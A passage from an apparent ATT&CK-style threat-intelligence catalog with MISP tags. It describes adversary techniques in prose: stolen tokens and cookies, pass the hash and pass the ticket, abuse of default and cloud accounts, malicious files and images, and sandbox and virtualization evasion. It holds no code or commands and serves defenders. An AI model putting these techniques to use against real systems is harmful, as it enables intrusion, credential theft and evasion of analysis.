Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://app.tidalcyber.com/technique/5ee96331-a7b7-4c32-a8f1-3fb164078f5f) for keylogging or attempt to [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1) like SSH or for use in decrypting other collected files such as email.

The tag is: misp-galaxy:technique="Private Keys"

Unsecured Credentials

Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. [Bash History](https://app.tidalcyber.com/technique/065d1cca-8ca5-4f8b-a333-2340706f589e)), operating system or application-specific repositories (e.g. [Credentials in Registry](https://app.tidalcyber.com/technique/cdac2469-52ca-42a8-aefe-0321a7e3d658)), or other specialized files/artifacts (e.g. [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a)).

The tag is: misp-galaxy:technique="Unsecured Credentials"

Unused/Unsupported Cloud Regions

Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.

Cloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.

A variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.

An example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://app.tidalcyber.com/technique/d10c4a15-aeaa-4630-a7a3-3373c89a584f), which can cost organizations substantial amounts of money over time depending on the processing power used.<sup>[[CloudSploit - Unused AWS Regions](https://app.tidalcyber.com/references/7c237b73-233f-4fe3-b4a6-ce523fd82853)]</sup>

The tag is: misp-galaxy:technique="Unused/Unsupported Cloud Regions"

Application Access Token

Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.

Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).<sup>[[Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019](https://app.tidalcyber.com/references/8ec52402-7e54-463d-8906-f373e5855018)]</sup>

OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.<sup>[[okta](https://app.tidalcyber.com/references/61e2fb16-d04b-494c-8bea-fb34e81faa73)]</sup>

For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.<sup>[[Microsoft Identity Platform Access 2019](https://app.tidalcyber.com/references/a39d976e-9b52-48f3-b5db-0ffd84ecd338)]</sup> With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.<sup>[[Staaldraad Phishing with OAuth 2017](https://app.tidalcyber.com/references/ae139c14-05ec-4c75-861b-15d86b4913fc)]</sup>

Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services to which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.<sup>[[Google Cloud Service Account Credentials](https://app.tidalcyber.com/references/c4befa09-3c7f-49f3-bfcc-4fcbb7bace22)]</sup><sup>[[AWS Temporary Security Credentials](https://app.tidalcyber.com/references/c6f29134-5af2-42e1-af4f-fbb9eae03432)]</sup> The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured (for example, by allowing all users to request a token for a particular account), an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.<sup>[[Rhino Security Labs Enumerating AWS Roles](https://app.tidalcyber.com/references/f403fc54-bdac-415a-9cc0-78803dd84214)]</sup>

Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the sts:GetFederationToken API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.<sup>[[Crowdstrike AWS User Federation Persistence](https://app.tidalcyber.com/references/8c4f806c-b6f2-5bde-8525-05da6692e59c)]</sup> Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

The tag is: misp-galaxy:technique="Application Access Token"

Pass the Hash

Adversaries may “pass the hash” using stolen password hashes to move laterally within an environment, bypassing normal system access controls. Pass the hash (PtH) is a method of authenticating as a user without having access to the user’s cleartext password. This method bypasses standard authentication steps that require a cleartext password, moving directly into the portion of the authentication that uses the password hash.

When performing PtH, valid password hashes for the account being used are captured using a [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) technique. Captured hashes are used with PtH to authenticate as that user. Once authenticated, PtH may be used to perform actions on local or remote systems.

Adversaries may also use stolen password hashes to "overpass the hash." Similar to PtH, this involves using a password hash to authenticate as a user but also uses the password hash to create a valid Kerberos ticket. This ticket can then be used to perform [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a) attacks.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>

The tag is: misp-galaxy:technique="Pass the Hash"

Pass the Ticket

Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account’s password. Kerberos authentication can be used as the first step to lateral movement to a remote system.

When performing PtT, valid Kerberos tickets for [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406) are captured by [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). A user’s service tickets or ticket granting ticket (TGT) may be obtained, depending on the level of access. A service ticket allows for access to a particular resource, whereas a TGT can be used to request service tickets from the Ticket Granting Service (TGS) to access any resource the user has privileges to access.<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup><sup>[[GentilKiwi Pass the Ticket](https://app.tidalcyber.com/references/3ff12b9c-1c4e-4383-a771-792f5e95dcf1)]</sup>

A [Silver Ticket](https://app.tidalcyber.com/technique/e7135af8-3668-4d94-90d2-2a93a6b5c327) can be obtained for services that use Kerberos as an authentication mechanism and are used to generate tickets to access that particular resource and the system that hosts the resource (e.g., SharePoint).<sup>[[ADSecurity AD Kerberos Attacks](https://app.tidalcyber.com/references/07ff57eb-1e23-433b-8da7-80f1caf7543e)]</sup>

A [Golden Ticket](https://app.tidalcyber.com/technique/12efebf8-9da4-446c-a627-b6f95524f1ea) can be obtained for the domain using the NTLM hash of the Key Distribution Service account (KRBTGT), which enables generation of TGTs for any account in Active Directory.<sup>[[Campbell 2014](https://app.tidalcyber.com/references/8bef22ff-f2fc-4e1a-b4d2-d746a120f6c6)]</sup>

Adversaries may also create a valid Kerberos ticket using other user information, such as stolen password hashes or AES keys. For example, "overpassing the hash" involves using a NTLM password hash to authenticate as a user (i.e. [Pass the Hash](https://app.tidalcyber.com/technique/33486e3e-1104-42d0-8053-34c8c9c4d10f)) while also using the password hash to create a valid Kerberos ticket.<sup>[[Stealthbits Overpass-the-Hash](https://app.tidalcyber.com/references/e0bf051c-21ab-4454-a6b0-31ae29b6e162)]</sup>

The tag is: misp-galaxy:technique="Pass the Ticket"

Web Session Cookie

Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.<sup>[[Pass The Cookie](https://app.tidalcyber.com/references/dc67930f-5c7b-41be-97e9-d8f4a55e6019)]</sup>

Authentication cookies are commonly used in web applications, including cloud-based services, after a user has authenticated to the service so credentials are not passed and re-authentication does not need to occur as frequently. Cookies are often valid for an extended period of time, even if the web application is not actively used. After the cookie is obtained through [Steal Web Session Cookie](https://app.tidalcyber.com/technique/17f9e46d-4e3d-4491-a0d9-0cc042531d6e) or [Web Cookies](https://app.tidalcyber.com/technique/b0966c0f-1e09-4d5d-acff-0ca79dc9da89), the adversary may then import the cookie into a browser they control and is then able to use the site or application as the user for as long as the session cookie is active. Once logged into the site, an adversary can access sensitive information, read email, or perform actions that the victim account has permissions to perform.

There have been examples of malware targeting session cookies to bypass multi-factor authentication systems.<sup>[[Unit 42 Mac Crypto Cookies January 2019](https://app.tidalcyber.com/references/0a88e730-8ed2-4983-8f11-2cb2e4abfe3e)]</sup>

The tag is: misp-galaxy:technique="Web Session Cookie"

Use Alternate Authentication Material

Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls.

Authentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.<sup>[[NIST Authentication](https://app.tidalcyber.com/references/f3cfb9b9-62f4-4066-a2b9-7e6f25bd7a46)]</sup><sup>[[NIST MFA](https://app.tidalcyber.com/references/2f069bb2-3f59-409e-a337-7c69411c8b01)]</sup>

Caching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system—either in memory or on disk—it may be at risk of being stolen through [Credential Access](https://app.tidalcyber.com/tactics/0c3132d5-c0df-4793-b5f2-1a95bd64ab53) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.

The tag is: misp-galaxy:technique="Use Alternate Authentication Material"

Malicious File

An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291). Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.

Adversaries may employ various forms of [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) and [Obfuscated Files or Information](https://app.tidalcyber.com/technique/046cc07e-8700-4536-9c5b-6ecb384f52b0) to increase the likelihood that a user will open and successfully execute a malicious file. These methods may include using a familiar naming convention and/or password protecting the file and supplying instructions to a user on how to open it.<sup>[[Password Protected Word Docs](https://app.tidalcyber.com/references/fe6f3ee6-b0a4-4092-947b-48e02a9255c1)]</sup>

While [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).

The tag is: misp-galaxy:technique="Malicious File"

Malicious Image

Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via [Upload Malware](https://app.tidalcyber.com/technique/8ecf5275-c6d1-4fe3-a24a-63fa1f3144fe), and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing techniques that specifically achieve Initial Access. This can lead to the execution of malicious code, such as code that executes cryptocurrency mining, in the instance or container.<sup>[[Summit Route Malicious AMIs](https://app.tidalcyber.com/references/e93e16fc-4ae4-4f1f-9d80-dc48c1c30e25)]</sup>

Adversaries may also name images a certain way to increase the chance of users mistakenly deploying an instance or container from the image (ex: Match Legitimate Name or Location).<sup>[[Aqua Security Cloud Native Threat Report June 2021](https://app.tidalcyber.com/references/be9652d5-7531-4143-9c44-aefd019b7a32)]</sup>

The tag is: misp-galaxy:technique="Malicious Image"

Malicious Link

An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from [Spearphishing Link](https://app.tidalcyber.com/technique/d08a9977-9fc2-46bb-84f9-dbb5187c426d). Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via [Exploitation for Client Execution](https://app.tidalcyber.com/technique/068df3d7-f788-44e4-9e6b-2ae443af1609). Links may also lead users to download files that require execution via [Malicious File](https://app.tidalcyber.com/technique/3412ca73-2f25-452a-8e6e-5c28fe72ef78).

The tag is: misp-galaxy:technique="Malicious Link"

User Execution

An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533).

While [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872) frequently occurs shortly after Initial Access, it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user’s desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://app.tidalcyber.com/technique/4f4ea659-7653-4bfd-a525-b2af32c5899b).

Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430), allowing direct control of the system to the adversary, or downloading and executing malware for [User Execution](https://app.tidalcyber.com/technique/b84435ab-2ff4-4b6f-ba71-b4b815474872). For example, tech support scams can be facilitated through [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://app.tidalcyber.com/technique/acf828f4-7e7e-43e1-bf15-ceab42021430).<sup>[[Telephone Attack Delivery](https://app.tidalcyber.com/references/9670da7b-0600-4072-9ecc-65a918b89ac5)]</sup>

The tag is: misp-galaxy:technique="User Execution"

Cloud Accounts - Duplicate

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. <sup>[[AWS Identity Federation](https://app.tidalcyber.com/references/b55ac071-483b-4802-895f-ea4eaac1de92)]</sup><sup>[[Google Federating GC](https://app.tidalcyber.com/references/4e17ca9b-5c98-409b-9496-7c37fe9ee837)]</sup><sup>[[Microsoft Deploying AD Federation](https://app.tidalcyber.com/references/beeb460e-4dba-42fb-8109-0861cd0df562)]</sup>

Service or user accounts may be targeted by adversaries through [Brute Force](https://app.tidalcyber.com/technique/c16eef78-232e-47a2-98e9-046ec075b13c), [Phishing](https://app.tidalcyber.com/technique/d4a36624-50cb-43d3-95af-a2e10878a533), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.

An adversary may create long lasting [Additional Cloud Credentials](https://app.tidalcyber.com/technique/0799f2ee-3a83-452e-9fa9-83e91d83be25) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.

Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://app.tidalcyber.com/technique/448dc009-2d3f-5480-aba3-0d80dc4336cd) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://app.tidalcyber.com/technique/af798e80-2cc5-5452-83e4-9560f08bf2d5) or other methods.

The tag is: misp-galaxy:technique="Cloud Accounts - Duplicate"

Default Accounts

Adversaries may obtain and abuse credentials of a default account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Default accounts are those that are built into an OS, such as the Guest or Administrator accounts on Windows systems. Default accounts also include default factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes.<sup>[[Microsoft Local Accounts Feb 2019](https://app.tidalcyber.com/references/6ae7487c-cb61-4f10-825f-4ef9ef050b7c)]</sup><sup>[[AWS Root User](https://app.tidalcyber.com/references/5f315c21-f02f-4c9e-aac6-d648deff3ff9)]</sup><sup>[[Threat Matrix for Kubernetes](https://app.tidalcyber.com/references/43fab719-e348-4902-8df3-8807765b95f0)]</sup>

Default accounts are not limited to client machines, but also include accounts that are preset for equipment such as network devices and computer applications, whether they are internal, open source, or commercial. Appliances that come preset with a username and password combination pose a serious threat to organizations that do not change it post installation, as they are easy targets for an adversary. Similarly, adversaries may also utilize publicly disclosed or stolen [Private Keys](https://app.tidalcyber.com/technique/e493bf4a-0eba-4e60-a7a6-c699084dc98a) or credential materials to legitimately connect to remote environments via [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1).<sup>[[Metasploit SSH Module](https://app.tidalcyber.com/references/e4ae69e5-67ba-4a3e-8101-5e7f073bd312)]</sup>

The tag is: misp-galaxy:technique="Default Accounts"

Domain Accounts

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup> Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.<sup>[[Microsoft AD Accounts](https://app.tidalcyber.com/references/df734659-2441-487a-991d-59064c61b771)]</sup>

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d) or password reuse, allowing access to privileged resources of the domain.

The tag is: misp-galaxy:technique="Domain Accounts"

Local Accounts

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: misp-galaxy:technique="Local Accounts"

Valid Accounts

Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.<sup>[[volexity_0day_sophos_FW](https://app.tidalcyber.com/references/85bee18e-216d-4ea6-b34e-b071e3f63382)]</sup> Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.

In some cases, adversaries may abuse inactive accounts: for example, those belonging to individuals who are no longer part of an organization. Using these accounts may allow the adversary to evade detection, as the original account user will not be present to identify any anomalous activity taking place on their account.<sup>[[CISA MFA PrintNightmare](https://app.tidalcyber.com/references/fa03324e-c79c-422e-80f1-c270fd87d4e2)]</sup>

The overlap of permissions for local, domain, and cloud accounts across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.<sup>[[TechNet Credential Theft](https://app.tidalcyber.com/references/5c183c97-0ab2-4b75-8dbc-9db92a929ff4)]</sup>

The tag is: misp-galaxy:technique="Valid Accounts"

Video Capture

An adversary can leverage a computer’s peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.

Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://app.tidalcyber.com/technique/4462ce9d-0a5a-427d-8160-7b307b50cfbd) due to use of specific devices or applications for video recording rather than capturing the victim’s screen.

In macOS, there are a few different malware samples that record the user’s webcam such as FruitFly and Proton. <sup>[[objective-see 2017 review](https://app.tidalcyber.com/references/26b757c8-25cd-42ef-bef2-eb7a28455d57)]</sup>

The tag is: misp-galaxy:technique="Video Capture"

System Checks

Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Specific checks will vary based on the target and/or adversary, but may involve behaviors such as [Windows Management Instrumentation](https://app.tidalcyber.com/technique/c37795d9-8970-461f-9491-3086d6b4b69a), [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde), [System Information Discovery](https://app.tidalcyber.com/technique/a2961a00-450e-45a5-b293-f699d9f3b4ea), and [Query Registry](https://app.tidalcyber.com/technique/58722f84-b119-45a8-8e29-0065688015ee) to obtain system information and search for VME artifacts. Adversaries may search for VME artifacts in memory, processes, file system, hardware, and/or the Registry. Adversaries may use scripting to automate these checks into one script and then have the program exit if it determines the system to be a virtual environment.

Checks could include generic system properties such as host/domain name and samples of network traffic. Adversaries may also check the network adapters' addresses, CPU core count, and available memory/drive size.

Other common checks may enumerate services running that are unique to these applications, installed programs on the system, manufacturer/product fields for strings relating to virtual machine applications, and VME-specific hardware/processor instructions.<sup>[[McAfee Virtual Jan 2017](https://app.tidalcyber.com/references/a541a027-733c-438f-a723-6f7e8e6f354c)]</sup> In applications like VMware, adversaries can also use a special I/O port to send commands and receive output.

Hardware checks, such as the presence of the fan, temperature, and audio devices, could also be used to gather evidence that can be indicative of a virtual environment. Adversaries may also query for specific readings from these devices.<sup>[[Unit 42 OilRig Sept 2018](https://app.tidalcyber.com/references/84815940-b98a-4f5c-82fe-7d8bf2f51a09)]</sup>

The tag is: misp-galaxy:technique="System Checks"

Time Based Evasion

Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.

Adversaries may employ various time-based evasions, such as delaying malware functionality upon initial execution using programmatic sleep commands or native system scheduling functionality (ex: [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8)). Delays may also be based on waiting for specific victim conditions to be met (ex: system time, events, etc.) or employ scheduled [Multi-Stage Channels](https://app.tidalcyber.com/technique/e54bdb49-6039-4048-9be6-657a7ff3e071) to avoid analysis and scrutiny.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Benign commands or other operations may also be used to delay malware execution. Loops or otherwise needless repetitions of commands, such as [Ping](https://app.tidalcyber.com/software/4ea12106-c0a1-4546-bb64-a1675d9f5dc7)s, may be used to delay malware execution and potentially exceed time thresholds of automated analysis environments.<sup>[[Revil Independence Day](https://app.tidalcyber.com/references/d7c4f03e-7dc0-4196-866b-c1a8eb943f77)]</sup><sup>[[Netskope Nitol](https://app.tidalcyber.com/references/94b5ac75-1fd5-4cad-a604-2b09846eb975)]</sup> Another variation, commonly referred to as API hammering, involves making various calls to [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560) functions in order to delay execution (while also potentially overloading analysis environments with junk data).<sup>[[Joe Sec Nymaim](https://app.tidalcyber.com/references/fe6ac288-1c7c-4ec0-a709-c3ca56e5d088)]</sup><sup>[[Joe Sec Trickbot](https://app.tidalcyber.com/references/f5441718-3c0d-4b26-863c-24df1130b090)]</sup>

Adversaries may also use time as a metric to detect sandboxes and analysis environments, particularly those that attempt to manipulate time mechanisms to simulate longer elapses of time. For example, an adversary may be able to identify a sandbox accelerating time by sampling and calculating the expected value for an environment’s timestamp before and after execution of a sleep function.<sup>[[ISACA Malware Tricks](https://app.tidalcyber.com/references/a071bf02-066b-46e6-a554-f43d0c170807)]</sup>

The tag is: misp-galaxy:technique="Time Based Evasion"

User Activity Based Checks

Adversaries may employ various user activity checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Adversaries may search for user activity on the host based on variables such as the speed/frequency of mouse movements and clicks,<sup>[[Sans Virtual Jan 2016](https://app.tidalcyber.com/references/5d3d567c-dc25-44c1-8d2a-71ae00b60dbe)]</sup> browser history, cache, bookmarks, or number of files in common directories such as home or the desktop. Other methods may rely on specific user interaction with the system before the malicious code is activated, such as waiting for a document to close before activating a macro<sup>[[Unit 42 Sofacy Nov 2018](https://app.tidalcyber.com/references/1523c6de-8879-4652-ac51-1a5085324370)]</sup> or waiting for a user to double click on an embedded image to activate.<sup>[[FireEye FIN7 April 2017](https://app.tidalcyber.com/references/6ee27fdb-1753-4fdf-af72-3295b072ff10)]</sup>

The tag is: misp-galaxy:technique="User Activity Based Checks"

Virtualization/Sandbox Evasion

Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) during automated discovery to shape follow-on behaviors.<sup>[[Deloitte Environment Awareness](https://app.tidalcyber.com/references/af842a1f-8f39-4b4f-b4d2-0bbb810e6c31)]</sup>

Adversaries may use several methods to accomplish [Virtualization/Sandbox Evasion](https://app.tidalcyber.com/technique/63baf71d-f46f-4ac8-a3a6-8345ddd2f7a8) such as checking for security monitoring tools (e.g., Sysinternals, Wireshark, etc.) or other system artifacts associated with analysis or virtualization. Adversaries may also check for legitimate user activity to help determine if it is in an analysis environment. Additional methods include use of sleep timers or loops within malware code to avoid operating within a temporary sandbox.<sup>[[Unit 42 Pirpi July 2015](https://app.tidalcyber.com/references/42d35b93-2866-46d8-b8ff-675df05db9db)]</sup>

The tag is: misp-galaxy:technique="Virtualization/Sandbox Evasion"

Disable Crypto Hardware

Adversaries disable a network device’s dedicated hardware encryption, which may enable them to leverage weaknesses in software encryption in order to reduce the effort involved in collecting, manipulating, and exfiltrating transmitted data.

Many network devices such as routers, switches, and firewalls, perform encryption on network traffic to secure transmission across networks. Often, these devices are equipped with special, dedicated encryption hardware to greatly increase the speed of the encryption process as well as to prevent malicious tampering. When an adversary takes control of such a device, they may disable the dedicated hardware, for example, through use of [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc), forcing the use of software to perform encryption on general processors. This is typically used in conjunction with attacks to weaken the strength of the cipher in software (e.g., [Reduce Key Space](https://app.tidalcyber.com/technique/aa6595d5-1b2e-45a8-8caf-b0968aeab2ba)). <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Disable Crypto Hardware"

Reduce Key Space

Adversaries may reduce the level of effort required to decrypt data transmitted over the network by reducing the cipher strength of encrypted communications.<sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

Adversaries can weaken the encryption software on a compromised network device by reducing the key size used by the software to convert plaintext to ciphertext (e.g., from hundreds or thousands of bytes to just a couple of bytes). As a result, adversaries dramatically reduce the amount of effort needed to decrypt the protected information without the key.

Adversaries may modify the key size used and other encryption parameters using specialized commands in a [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) introduced to the system through [Modify System Image](https://app.tidalcyber.com/technique/f435a5ff-78d2-44de-b464-2b5528f94adc) to change the configuration of the device. <sup>[[Cisco Blog Legacy Device Attacks](https://app.tidalcyber.com/references/f7ce5099-7e04-4c0b-8767-e0eec664b18e)]</sup>

The tag is: misp-galaxy:technique="Reduce Key Space"

Weaken Encryption

Adversaries may compromise a network device’s encryption capability in order to bypass encryption that would otherwise protect data communications. <sup>[[Cisco Synful Knock Evolution](https://app.tidalcyber.com/references/29301297-8343-4f75-8096-7fe229812f75)]</sup>

